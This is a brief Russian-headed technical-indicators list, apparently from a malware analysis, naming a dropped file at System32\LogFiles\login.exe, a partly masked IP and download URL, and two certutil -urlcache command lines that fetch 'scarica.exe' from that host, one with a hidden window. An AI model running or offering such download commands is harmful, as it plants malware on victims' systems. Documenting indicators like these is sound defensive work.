Техническая информация
- <SYSTEM32>\logfiles\login.exe
- '62.##3.147.2':80
- http://62.##3.147.2/scarica.exe
- '%WINDIR%\syswow64\cmd.exe' /c certutil -urlcache -split -f http://62.##3.147.2/scarica.exe %WINDIR%\\System32\\LogFiles\\\login.exe (со скрытым окном)
- '%WINDIR%\syswow64\certutil.exe' -urlcache -split -f http://62.##3.147.2/scarica.exe %WINDIR%\\System32\\LogFiles\\\login.exe